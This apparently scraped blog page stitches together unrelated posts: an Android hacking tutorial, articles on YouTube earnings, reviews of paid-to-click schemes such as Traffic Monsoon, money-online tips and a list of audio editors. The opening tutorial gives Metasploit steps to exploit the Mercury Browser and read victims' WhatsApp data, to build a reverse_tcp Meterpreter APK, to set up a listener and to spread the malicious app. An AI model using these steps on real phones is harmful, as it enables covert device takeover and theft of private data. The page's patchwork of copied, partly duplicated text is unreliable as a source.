Friday 5 August 2016

Android with Mercury Browser parseuri exploit.

Android with Mercury Browser parseuri exploit.


 Start Metasploit and load the exploit as shown below. Set the required options ( i.e actually we need to set only one option, localhost )

Then type command “exploit” as shown below. A server will start at the localhost as shown below.

Now the only thing we need to do is make the Android users open the above url with Mercury browser. Once the android user opens the link, the exploit will run as shown below.

Now, on your localhost ( attacker machine ), open a browser and type the android user’s IP address as shown below. We got the IP address in the above picture only. As shown below, you can access all the data of our victim.

Given below are the victim’s Whatsapp data.

Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=
As described above that attacker IP address is, below is our screenshot when executed the command
Hacking Android Smartphone Tutorial using Metasploit
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.
Hacking Android Smartphone Tutorial using Metasploit
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
Hacking Android Smartphone Tutorial using Metasploit
set lhost –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution 🙂 ).
6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:
Hacking Android Smartphone Tutorial using Metasploit
7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
Hacking Android Smartphone Tutorial using Metasploit
See the video below if you are not clear about the step by step Hacking Android Smartphone Tutorial using Metasploit above:

1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.
Hacking Android Smartphone Tutorial using Metasploit
- See more at:

YouTube Earnings

here's an extraordinary amount of hype around the topic of making money from YouTube. And, by making money, we mean enough to earn a living wage so that you can realize your dreams of working in video production full time. Of course, there are thousands of YouTubers that are making enough to focus on their career full time, but the overwhelming majority of YouTuber users will see very little revenue return. It takes hundreds of thousands of views to see any kind of worthwhile weekly ad revenue income and millions of views to make becoming a full time partner sustainable.
YouTube is expected to attract $5 Billion in advertising revenue this year so how do creators get a piece of the pie? After all, it's their content that's bringing the advertisers to the site in the first place. We take a look at some of the ways you can make money on YouTube how the site is facing a backlash from those who think the business model is broken.
  • YouTube's Partner Program
  • Advertising Earnings
  • Sponsorships & Merchandising
  • Paid Subscriptions
  • Earnings with Multi-Channel Networks (MCNs)
  • Issues with YouTube's Business Model?
Let's start at the beginning with what it takes to become a partner so you can actually monetize your video content.

What Exactly is a YouTube Partner These Days Anyway?

Nowadays, anyone with access to the internet can upload a video to YouTube.  However, if you want to make money off that content, you'll need to become a YouTube Partner.  So, how do you become a revenue generating YouTube partner? Well, it's pretty easy these days actually.
Once upon a time you could only become a YouTube partner if you applied directly and were approved, or if you received a personal invite from Google.  Today however, anyone whose account is in good standing can become a YouTube partner through expressly allowing YouTube to place advertising in, on, and around your video content. Google makes money from the views of these ads and partners can then earn a percentage via a Google Adsense account. Exactly how much money a partner can make varies enormously and depends on a range of different factors.
YouTube states that there are more than a million channels in the Partner Program (up from 30,000 in 2011), with YouTube estimated to take a 45/55 share of the ad revenue. Official figures aren't available but partners only really make a fraction of a cent per view.
To start the process of becoming a partner, go to your 'Account Monetization' page in 'Channel settings'  click on the “Enable My Account” button. Once you've been accepted, (which is a really quick process) you're on your way to monetizing your videos.
Be prepared for issues with approval if you are seen to be in violation of any copyright agreements or are publishing material that's deemed abusive, racist or sexually explicit. Google will take down this type of content and your account's good standing may be affected if you continually break the rules.

What Do YouTube Partners Earn From Advertising Revenues?

YouTube takes around a 45% slice of advertising revenue, although the CPM (cost per thousand) that advertisers are charged varies. Most partners earn anywhere between $0.30 to $2.50 CPM, but there are many exceptions to the rule, with some of the bigger YouTube players earning closer to a $10 CPM. Be aware that your location and the type of content that you publish will have a bearing on how much you can potentially earn.
Socialblade is also good if you want to poke around in other's channel statistics and take a look at their very estimated earnings. A recent Reddit thread attracted contributions from all over the world with tales of CPM margins ranging from $0.10 to $6.
ALSO ►  Evan Carmichael: YouTube Channel Review - Through the 'Reel' Wringer
Before you get too excited though, remember that creators only get paid if their views are monetized. Many mobile views, those blocked by Adsense, and those where advertising has been switched off for some reason, do not count. 50,000 views doesn't mean that 50,000 of those views were monetized.
The top 1000 channels bring in around $23,000 per month from advertising - but then again, they also average around 900,000 monthly video views, and because they're popular channels, they are likely commanding more generous CPM rates.
youtube-moneyExample of Potential Earnings (@1M views per month):
$2,500/mo = $2.50 CPM x (1 Million views/1000)

Partner Earnings From Sponsorship/Merchandise Deals

There are a number of popular YouTube creators who have secured lucrative sponsorship deals with brands because these YouTubers have large, relevant, and engaged audiences. And, sometimes, they are just in the right place at the right time, I'm looking at you Grumpy Cat.
Sponsorship agreements are settled outside of YouTube and can take on many forms depending on the deal agreed.
Beyond sponsorships, some YouTubers are so popular that they're able to sell their own merchandise to their viewers. YouTuber Michelle Phan not only signed a high profile deal with cosmetics giant Lancome but also launched her own line of make up products which more than supplement any income she gets from YouTube.  Creators, such as Phil deFranco, run their own line of merchandise products and many YouTubers are finding opportunities outside of the site in TV and movie appearances.
youtube-moneyPotential Earnings:
$100 to $1,000,000+
If you're interested in brands partnering with creators on youtube, be sure to check out Tubular Creator Profiles for the world's largest, free database of creators and brands.

Partner Earnings From Paid Channel Subscriptions

In May 2013, after months of speculation, YouTube finally announced a paid channel subscription service which allowed creators and publishers to charge for their video content. 53 channels were launched with monthly fees ranging from $0.99 to $6.99. The new feature, with a 55/45 split in revenue in favor of YouTube was widely regarded as a toe in the water to see whether consumers would be willing to pay for content in the same way they paid for VOD services like Netflix. The new pay per view content model, comes with a 14 day trail and discounts on yearly rates.
Just earlier today - YouTube announced that they are now allowing any monetized partner, with more than 10,000 subscribers, to enable paid subscriptions on their channel.
youtube-moneyExample of Potential Earnings (@10K Subs paying $1.99):
$1.99 (45% split = $0.90) x 10,000 subscribers = $108,000/year

Increased Earnings with MCNs (Multi-Channel Networks)?

Over the past two years, we've witnessed the rapid rise of YouTube MCN (Multi-Channel Networks) formed in various ways to help support creators and to create more attractive packaged offerings for monetization. MCN's are independent companies (not endorsed by YouTube/Google) who aggregate multiple YouTube channels, and offer assistance to creators in various forms that can include among other things, programming, collaboration, promotion, copyright management, and increased earnings.  MCNs are able to offer increased earnings due to the fact that they are often able to command higher advertising rates through direct ad sales, sponsorships, and packaging.
For the average doing-this-outside-the-day-job partner, your earnings from joining an MCN are not going to rock your world. BUT, for a percentage of your ad earnings, MCNs can offer the kind of invaluable support that can help you build up your channel, your subscribers and ultimately, your earnings.
ALSO ►  Top Online Video Creators Across Social: March 2016
Every Multi-Channel Network have their own rates including fixed CPMs where they pay you a flat rate per 1000 monetized views, or via a contract which gives you a percentage of whatever your channel generates (this can be anywhere upwards of 60%). Machinima offer their content partners a $2 CPM rate which might seem thin, but then they do offer support and legal advice when it comes to copyright issues, a bit problem with gaming videos.
If you're interested in learning more, read our post on the pros and cons of joining a YouTube MCN.

Monetization Issues: Is The YouTube Business Model Broken?

There have been grumblings from some YouTube creators that the revenue model is unfair. Technological challenges had proved an issue for the new pay per view channels and some MCNs are complaining that the rate of return from ad revenue is unsustainable.
Jason Calacanis stirred up quite the heated debate earlier this year with his post titled, "I ain't gonna work on YouTube's farm no more."  In it, Jason rants against YouTube's model and calls the 45% share a "YouTube Tax.".
"In a way, YouTube is the Sebastian Shaw of the ecosystem, absorbing all your power and talent and using it for their prime directive: maintain the 45% tax through control of talent, advertisers and user behavior. "
He even created a YouTube 'Bill of Rights' that aims to try and repair the "damage" he sees between YouTube, MCNs, and other content partners.
For smaller scale creators, leaving YouTube is, at the moment, an unthinkable concept. It is, after all, where the audience is. And speaking of audience, 41% of it now comes via mobile, so there are still some huge advertising headaches to sort out where that is concerned.
At our Video Marketing Summit, Jim Louderback led a lively discussion with Greg Jarboe and Paul Colligan, on the current state of YouTube.
Oh, and there's a handy little calculator tool that lets you estimate YouTube Partner ad earnings based off of a set number of video views, using the average CPM range mentioned above ($0.30-$2.50CPM).


It is possible to make a living from YouTube, but as with any creative endeavor, the harder you work, the more optimized your videos are, the greater you are at marketing and collaboration (and the hundreds of other little skills and synchronicities that go into make a project work for you), the more likely you'll be able to generate an income.  Creating regular, consistent content (weekly, or even better, daily), sharing it out via others sites and social networks, encouraging engagement, being active on the site, caring what you do is  what it's going to take to make you successful.
So, is it worth monetizing your content if you know that you will struggle to reach the views needed, or you find the MCN experience is not for you? Absolutely.
When you become a YouTube Partner through monetization, you're then eligible to use some great YouTube features that are unavailable to non-monetized users, like custom thumbnails, associated website annotations, in-video programming, live streaming, and more. Additionally, if you strike lucky and upload a video that gets a lot of attention there's no way to claw back those potential earnings. Becoming a partner ensures that future views are accounted for, and even if they bring in only a few dollars a year, that's still money that you have earned.

youtube Make Money From Home

There are at least a dozen ways to make money online. These include blogging for money, affiliate marketing, eBook revenues, freelancing with sites like Upwork or oDesk, earning from AdSense, and so on.
But if we were to choose the best 2 options to make money online, blogging is usually number one, followed closely by monetizing YouTube videos.

Why Not Use YouTube as the First Online Money Option?

When a person decides that their primary source of income will be earned online, they need to think about how best to achieve this. Most people choose blogging as their method for earning online income. Maybe it’s because they are lured by CPC values of certain keywords in interesting niches, or maybe they just like writing.
But there’s another very good option: YouTube.
You may be surprised to hear that YouTube could help you earn more than you would from traditional blogging. This is particularly true in the first phase of your online stride.
Let’s examine why YouTube may prove to be a better monetization method than blogging.
1) No domain and hosting investment.
The biggest advantage of YouTube is that you do not need to buy a domain or hosting package to get started. Instead, you can make your online presence known simply by the virtue of your channel.
  • You can see Harsh’s channel here.
The YouTube channel is where a user will see all of the uploads and recent activity of the uploader. If the uploader has enabled certain settings, visitors can also see the uploader’s interactions.
In terms of hosting, it’s really cool to get your content hosted for free by a site which is among the world’s top 5 websites and whose servers are present almost everywhere the internet exists.
In a nutshell, YouTube can allow you to earn money from the comforts of your home with zero investment.
  • Easy ways to earn money online by sitting at home
2) It is possible to earn on the very first day with YouTube.
The most beautiful thing about earning with YouTube is that you can earn from your video content on the very first day.
You can simply make a YouTube account and upload a video (any video which does not violate YouTube or AdSense terms and conditions).
This can be a video about a trip you took. Or a video about how you made masala dosa in the morning.
People have uploaded a wide-variety of videos and found success out of nowhere.
When Charlie’s father uploaded this video, he never would have thought it would be watched by hundreds of millions of people. Now, “Charlie Bit My Finger” is not just a video; it’s a brand. In the span of a few years, this simple video has made more money than the lifetime goal of an above-average blogger.
3) AdSense approval via YouTube is easy.
Most Indian and other South Asian bloggers wait for 6 months (or more) to get their AdSense account approved.
But if you apply for AdSense via YouTube, getting approval is easy. However, this AdSense account will be “AdSense for content hosts”, which functions differently than the traditional ads shown on blogs.
But you can always add your blog or website to this account once you think you fulfill all of the criteria to get an approved site.
Also read:
  • What is video blogging and what are the advantages of videos?
  • How to prepare for making a tech video show
4) Big audience and ready-made platform on YouTube.
Once you upload your video, it will be instantly available to billions of YouTube visitors. If your video is catchy and turns out to be sensational, it can certainly catapult you to fame and earn you a substantial amount of money.
People have rocketed their YouTube views in a matter of a day or two and earned hundreds of dollars in a very short time.

How to make money on YouTube?

There are people out there who make a lot of money with YouTube. There are even some artists who are earning over $2,000 every day from their YouTube videos.
There are a variety of ways to make money on YouTube.
These three are the easiest and most popular.
Google AdSense:
You can monetize your YouTube channel with AdSense. AdSense shows contextual ads on your videos and you earn money whenever a viewer clicks on the ad. This is by far the easiest way that YouTubers are making money.
Sponsored video:
This works great when you have an established and popular channel. You can get sponsors for your videos who will pay you to show their advertisement at the start or the end of your video.
If you’re channel is popular, this is one great way to earn huge from YouTube.
Affiliate marketing:
This method will let you earn a large amount in a very short time. All you need to do is pick the right product, create a video around it, and put the link in the description. You earn per sale and usually (depending on the affiliate partner) the payout is pretty nice.
  • You can learn more about affiliate marketing in this post.

In a nutshell, YouTube can help you earn money if you don’t have a blog or if you are still in the process of building one. And once your blog is all set to go, you can put the video version of your blog posts on YouTube to earn some extra bucks.
YouTube can also benefit you by getting website visitors who are not using Google as their primary search engine, but who found out about your site from one of your videos.
YouTube supports almost all video formats and you can post videos in a wide range of categories. You can post about your trip to Goa or do a video review of the hotel you stayed at in Mumbai.
You can also make tutorials about WordPress, hosting platforms, and other blogging or tech-related things. There is a lot of software out there which will let you record your computer screen making on-screen tutorials easy to produce. Or maybe you want to do reviews of new phones or gadgets.
The possibilities are endless; so are the earnings.
Have you been using YouTube? Have you been making money? Let me know in the comments below.  If you have any questions or would like more information about how to monetize YouTube videos, ask me in the comments.
Reasons why you should avoid using Deceiving; Creating false impression – This kind of PTC sites are very attractive for new users because they offer $0.10 per click. Remember there are no get-rich-quick schemes, the only persons who benefit from these programs are the owners. You will be allowed to request a payment once your account balance has reached $100. But are you going to be paid? Don’t have high expectations. Don’t be surprised if your account is suspended or your earnings cleared once you have reached the minimum payout threshold. Most people find it difficult to make good income working from home, despite whatever promises are made. Paying users $0.10 for a simple task such as viewing advertisement for a few seconds is not credible. This site is created to attract people with these high click rates and to get a lot of free traffic to the website links they display, but without paying anything in return.

Read more: Can you tell me that is a real earning or fake site? - Can you tell me that www ptcbank net is a real earning or fake site :: Ask Me Fast at
Reasons why you should avoid using Deceiving; Creating false impression – This kind of PTC sites are very attractive for new users because they offer $0.10 per click. Remember there are no get-rich-quick schemes, the only persons who benefit from these programs are the owners. You will be allowed to request a payment once your account balance has reached $100. But are you going to be paid? Don’t have high expectations. Don’t be surprised if your account is suspended or your earnings cleared once you have reached the minimum payout threshold. Most people find it difficult to make good income working from home, despite whatever promises are made. Paying users $0.10 for a simple task such as viewing advertisement for a few seconds is not credible. This site is created to attract people with these high click rates and to get a lot of free traffic to the website links they display, but without paying anything in return.

Read more: Can you tell me that is a real earning or fake site? - Can you tell me that www ptcbank net is a real earning or fake site :: Ask Me Fast at

Traffic Monsoon Review

Traffic Monsoon isn’t the only paid-to-click game in town, but it does have several features which make it a likely candidate for anyone who thinks they can game that system by either making money or procuring quality traffic to their website.
You’ll see what those features are below, but first a little bit about the company.

The Company

Traffic Monsoon is just about one year old, and their website reveals little about who runs the company or anything else about the company, frankly.  Seems they haven’t latched onto the new generation of internet businesses who believe in transparency and all those other trappings of the real business world that have made their way into the network marketing arena.
We just reviewed the premium high traffic academy and you will quickly see the differences between these 2 advertising/online traffic generation companies and services.
Nope, there’s nothing to give the potential “joiner” any confidence that this company will still be afloat a year from now.  Neither are there any nods to any type of company data such as growth stats or revenue over the past year.
Other oddities that seem a little amateurish:
  1. There are unattributed testimonials from “ghosts”, always a good sign.
  2. There is also a blanket statement about the economy and home-based business, linking the growth of the latter to the 2008 downfall of the former.  Ummm, yeah but how is that relevant to Traffic Monsoon?  Seems like odd filler content.  They’re writing so much but saying so little.
  3. They do not say how large their network is, so it’s hard to judge whether it’s worth joining.
  4. There are no examples of websites which are currently part of the network, either.

The Products are The Opportunity

The main product here is advertising.  Business owners can buy ad packs starting at $5 and get visitors and banner clicks in return.  But by purchasing the ad packs they have the option of participating in the opportunity, too.  The only requirement fr getting paid is that a member clicks at least 10 ads per day.
Here’s how it all works:
  1. Traffic Monsoon is an advertising platform.  Business owners can purchase ads to be put on websites which are part of a “get paid to visit” network.  They’re buying eyeballs on sites, in other words.  They may use cash or they can join the network themselves and visit other members’ websites in order to earn credits which can be used to purchase traffic.  Members can join for free (there’s no requirement to purchase credits or visitors).  It works like this: visit 2 websites and get 1 visitor credit.  Purchase services and get one visitor credit per visit to a website.  In essence, you’re all helping each other out.
  2. It’s also a “paid to click” opportunity.  Members get paid a penny for each click (Traffic Monsoon sells clicks, not views.  That means members pay for actual clicks, not just visitors to their sites).
  3. It’s also a revenue sharing platform, where members who get new members to join and purchase advertising can earn commissions.
  4. It’s also an affiliate program, where members can refer their website visitors to other members’ products and services for a commission.  The commission rate is 10%.
The ads come in several different forms:
  • banner ads
  • text ads
  • traffic exchange start pages
  • traffic exchange credit purchases (buy visitors instead of earning credits by clicking)
  • login ads
You can also target specific countries in your ad campaign, which costs $.50 per click.  Otherwise, it’s $.25 per click.  Traffic Exchange Start Pages is an ad product you can buy for $35 per day.  It puts your site first on the list of members’ start page after they log in.  Login Ads are similar, except your website is placed in a pop-up window when members are logging in.  Same price: $35 per day.

The Verdict

It’s really too bad Traffic Monsoon is so stingy with its company info.  The product and the opportunity seem straightforward enough (although as a “clicker” be prepared to slog away for endless hours upon end!).
That means earning enough credits to purchase visitors is almost more of a risk than outright purchasing them (it costs $70 for 50,000 visitors, $16 for 10,000 visitors, and down to $5 for 2500 visitors or up to $600 for 500,000 visitors).  Without some sort of “quality assurance” behind this company, it’s hard to invest using either method.

Traffic Monsoon

Traffic Monsoon, run by American Charles Scoville, promises members a slice of the millions paid in online advertising every day.
Apparently all you have to do to is fork out $50 (£35) for an “ad pack”, and then daily click on 10 adverts that link to other projects such as Scoville's AdHitProfits.
It's easy to see how Scoville benefits - he gets ad pack revenue and traffic is driven to his sites through those clicks. But what's in it for people who join?
Read more: The victims who stood up to advertising scam ringleader
Well, once you're in, the more people you recruit, the more commission you get when they buy their own ad packs.
Which makes it sound suspiciously like a pyramid scheme and very similar to My Advertising Pays – which I exposed last year.
One worried reader told me a friend has poured her life savings into Traffic Monsoon.
“I have no doubt that there must be hundreds, if not thousands, of people like her who have put this sort of money in,” he said. “This stinks to high hell.”

My colleague Antonia Paget went to a Traffic Monsoon seminar in London that had the air of a cult meeting.
More than 250 people cheered and clapped as speakers praised the rapid growth of the scheme, which they say now boasts more than four billion users.
If over half the world’s 7.4 billion population is involved, it’s a surprise I haven’t heard of it before. Members were encouraged to bring guests and one man told a newcomer that it would be “the easiest grand you’ll ever make”.
Read more: 'Internet millionaire' says it's simple to get rich - but won't answer calls
But there’s a snag – users are struggling to remove their cash. Scoville claims this is because he is moving the company’s $54 million from PayPal and launching his own ‘TM World Bank’ in the Dubai World Trade Centre.
He’s not got back to me which is a shame, because I wanted to ask the self-styled “international leader in paid-to-click advertising” if he was also behind previous failed online money schemes including InfinityBux and Tviptc.



Every one can earn money online. If you are a hard working talented person with basic computer knowledge and have an internet connection at home you can easily earn a decent amount of money online every month. But the amount of money would be different. I would like to divide them into three group stages based on their earnings.


This is the group for new comers and they totally don’t know how to earn money online. They are seeking for jobs all around the net but due to lack of experience they failed to get any job. In that time they choose PTC, Captcha Entry and other typing based jobs. These jobs are hard working and specially made for newbie because they are less experienced.
The amount of earnings from these kinds of jobs is quite low. It is not more than 100 USD per month. But for the inexperienced newbie it is a decent amount. And it could be their side income also. So don’t be upset and try to obtain more demandable qualifications for better income.


This group earns much better amount of money than the previous one. They are more experienced and qualified. They can maintain Blogs with Google Adsense or other Ads, Writing Articles for Blog or Web, doing some easy Freelancing jobs like File Conversions, Virtual Assistance and much more.
With these kinds of jobs they can earn a good amount of money. It could be more than 500 USD per month. But this is not the final stage of earn money online. You can earn Huge amount of money and can live a gorgeous life without going to so called office.


This is the final group stage of earn money online. In this group they are all learned, qualified and experienced in advance stage of freelancing. They can earn more than 2,000 USD per month. It is not a joke. Just take a look on this Odesk Freelancer’s profile.
oDesk Profile
To be a qualified freelancer you have to learn and pass some qualifying examination in the market places like Odesk on various demandable subjects like Web Development, Web Designing, Web Programming, Ecommerce, Software Development, Network Administration, DBA – Database Administration, Graphic Designing, 3D Modeling & CAD, Animation, Engineering & Technical Designing, SEO – Search Engine Optimization, Sales & Lead Generation, Business Consulting, Statistical Analysis, Project Management, Technical Writing, Web Research and much more. Online free tutorials can help you to learn those subjects easily. So learn more and earn more and lead a better life.
Beside these, there are many alternative ways to earn money online. HYIP (High Yield Investment Program), Affiliate Marketing Program, Domain Perking, Paid Surveys etc are among them. So go for the best and be a successful Freelancer.

Wednesday 3 August 2016

Audio Editing Software

Let that be about creating a ringtone out of your favourite film song or creating a fusion of songs for the dance in the college; an effective audio editing software is necessary. Also, when you are passionate about music creation and do want your output in the best possible & professional manner, you have to depend upon fully-fledged environment to get the best out of your efforts. Just like any other purpose, choosing one solution for audio editing would be tough-enough, given the different capabilities each tool possesses. In this post, however, we will have a list of 10 best audio editing software; it’s to be noted that each tool is suitable for unique purposes and you can’t just choose one and go. So, we have tried to point out main features of each audio editor, letting you get the tool that suits the particular use of yours.

Best Audio Editing Software

1. WavePad

WavePad — which comes from NCH Software that is known for the easy-to-use productivity tools — is a good-to-go, intuitive solution when you need professional-level audio editing in your PC. You can use the tool for the creation of a music fusion by blending different tracks and professional music creation through recording and all. WavePad does offer support for almost every popular audio format, such as MP3, WAV, VOX, GSM, WMA, OGG, AAC, etc. And, as it comes to the audio editing aspect, you have both advanced and standard features. For instance, WavePad offers lots of functions like copy, insert, silence, auto-trim etc. In addition, WavePad lets you apply certain sound effects to your work as well. On top of all, tab-based interface of WavePad makes more than enough sense, and you will have to get additional plug-ins if you want to enhance productivity tools.
  • Price: Free and Premium Versions starting from $39.95
  • Availability: Windows 10, 8.1, 8, 7; Mac OS X 10.4 and above; apps for Android and iOS
Visit Website

2. Audacity

Audacity is a completely free audio editor, result of an open source initiative! Despite all the professional-level set of features that Audacity has — such as multi-track editing and support for live recording —, the simplicity of its UI is so impressive. Audacity supports the popular audio formats including WAV and MP3 but you will have to download one separate encoder for the latter. Other notable features of Audacity include easier editing through cut and paste, the feature for noise reduction and vocal reduction, etc. Also, when we come to the editing aspect, there are a lot to talk about, such as navigation controls and different kinds of editing processes. If you check out the screenshots, you can understand how easy the User Interface is, despite its richness in terms of features. Yet another thing worth-noting about Audacity is its multi-platform support. By the way, it has some truly useful sound effects too.
  • Price: Free
  • Availability: Microsoft Windows 8, 7, Xp; Mac OS X 10.5 to 10.10 and Linux
Visit Website

3. FL Studio 12.1.2

FL Studio
Unlike aforementioned tools, which are actually easy-to-use audio editors, FL Studio 12.1.2 is a fully-fledged DAW — Digital Audio Workstation, which lets you mix and create music as you like. One thing that makes FL Studio 12.1.2 an impressive tool is its regular updates, through which you can have state-of-the-art features. For instance, if you have a monitor with multi-touch support, the entire process of audio editing would be just awesome, we bet. By looking at the User Interface, you can just feel the professionalism and it will be as professional as it can be when you are all set to record music and create your own tracks in the most convenient manner. Noticeable features of FL Studio 12.1.2 include enhanced file browser, availability of plug-ins, scalable UI etc.
  • Price: 3 editions available, basic version starts from $99
  • Availability: Windows 10, 8.1, 8, 7, XP; Intel Mac OS X 10.8 or 10.9 (Yosemite is not supported). Mobile apps are also available for iOS (iphone, ipad, ipod touch) and Android.
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4. Ardour

Ardour is yet another Digital Audio Workstation that lets you record, edit and mix tracks, using an interface that can be professional-enough as well as easy-to-get-used-to at the same time. Ardour can be useful for professionals such as audio engineers, musicians, sound track editors and composers. While Ardour lets audio engineers mix their MIDI projects with ease, the enhanced recording options would do well for musicians and composers. When we consider the features aspect, Ardour has a lot to talk about: support for editing hardware makes everything easier while multi track recording makes sense too. There are advanced options in the editing and mixing section too. For instance, you have Routing, Inline Plugin Control, etc in mixing section. It is to be noted that productivity of Ardour can be made to fit your requirement using certain plug-ins.
  • Price: Pay at least $1 for full programme features.
  • Availability: Intel OS X 10.6 (Snow Leopard) to OS X 10.10 (Yosemite); Intel/AMD Linux (2 GB RAM is recommended)
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5. Wavosaur

Wavosaur is a free audio editor that actually lies between a Digital Audio Workstation and a minimalistic music-mixing tool. Using Wavosaur, it is possible for you to manage different kinds of music tracks with ease. In addition, Wavosaur offers some stunning, impressive features too. For instance, it gives you basic editing through cut, copy and paste, various processing ways, ability to use different skins to meet your requirements and tastes. It also offers some advanced features such as the batch processing ability, file exporting through third-party software, etc. In addition, you can have ASIO Support and multi-channel audio editing support with Wavosaur, making it an all-in-one solution for passionate audio editors out there. By the by, Wavosaur is often noted for its VST Support.
  • Price: Free
  • Availability: Microsoft Windows XP, 7, Vista
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6. Adobe Audition

Adobe Audition (1)
Adobe Audition is a part of Adobe Creative Cloud and you can rely upon the tool when you need professional-level editing tool for your musical projects. Adobe Audition offers superb capabilities such as multi-track editing as well as the non-destructive editing/mixing environment for you to work. The latest version of Adobe Audition, being a part of Creative Cloud, is available as a 64-bit application, which offers advanced performance in supported systems. The tool comes with a UI that is similar to that of other Adobe products and you can get started with it, easier than you’d really think. Yet another feature of Adobe Audition is that you can have expert tutorials that you can depend upon at the official site of Adobe Audition.
  • Price: Part of Adobe Creative Cloud Package (Offers 30 day trial) – $29.99 a month
  • Availability: Windows 8 , 7; Mac OS X 10.7 Lion, Mac OS X 10.6 Snow Leopard
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7. Sound Forge Audio Studio 10

Sound Forge Audio Studio 10
Sound Forge Audio Studio 10 from Sony is often called the home studio for audio production and the list of features and capabilities will force us to affirm that. Almost every aspect of music creation, from the high-quality recording of audio source to using effects and other methods to refine your input, will be possible through Sound Forge Audio Studio 10. The concept of the tool is rather easier, we would say. You can use it in the professional manner if you do need so. Otherwise, you can go with the easy-to-use section of it, where editing and mixing is a matter of clicks. Sony has included 24-bit/192 KHz support in Sound Forge Audio Studio 10, letting you deal your project with no kinds of compromise in terms of quality of input. Talking of editing, some preinstalled audio effects are there, which you can use for making your music impressive. Also, we have to add VST audio plug-in support to the list, when talking about Sound Forge Audio Studio 10.
  • Price: $59.95
  • Availability: Microsoft Windows and Mac OS X
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8. Steinberg Cubase

Best video editor software
Steinberg Cubase, commonly known as Cubase, is a popular software when it comes to music production tools and Digital Audio Workstations. The latest version of Cubase — Cubase v8 — brings a handful of impressive features with a truly professional interface. Steinberg Cubase is known for the features that prioritize creativity rather than a set of useless tools. Many professionals, including songwriters, bands and producers, are using Steinberg Cubase for their music production purposes and Cubase has suitable features for all the purposes. For instance, seamless integration with your existing music studio hardware and award-winning audio engine help music producers, it helps all those songwriters to record and listen to their songs, quite easily. Also, different plans are available for Steinberg Cubase.
  • Price: 99.99 Euros for Cubase Pro 8
  • Availability: Windows 7, 8; Mac OS X 10.9, 10.10
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Linux MultiMedia Studio, now known as LMMS, is a free audio editor software, which can be a superb-enough alternative for FL Studio, but completely free to use! LMMS offers a huge number of impressive features as a whole, including the FX Mixer, Automation Editor, support for MIDI Keyboard, some in-built audio effects and instruments and compatibility with some popular standards in Digital Music Production and editing. The UI of LMMS is truly professional one and the availability of plug-ins can take the productivity to a new extent too. so, when you are not ready to pay, LMMS is a solution you can depend upon for easier editing and mixing of music. Of course, there are a few perks of being an Open Source project, such as wide range of support. Also, to be noted, LMMS is made by a set of musicians!
  • Price: Free
  • Availability: Microsoft Windows, Mac OS X and Linux.
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10. PreSonus Studio One

PreSonus Studio One
A truly professional audio editor, PreSonus Studio One deserves a place in the list, at least for the set of professional-level features one can have from the tool. PreSonus Studio One is commonly used for several kinds of purposes such as recording and mastering. The Interface may seem tough for a beginner, but when you have got the taste of digital audio production, you will find it damn productive, we bet. Despite this, it offers drag-and-drop and other features for management of media and effects, which is a big deal, indeed. It is to be noted that PreSonus Studio has three different versions and that availability of features varies according to the version you choose. If you want 64-bit performance, for instance, you have to choose PreSonus Studio One Professional version. In short, it is a good-to-go professional solution for musicians.
  • Price: Free & Feature-limited version available. Artist version for around $85
  • Availability: Microsoft Windows and Mac OS X
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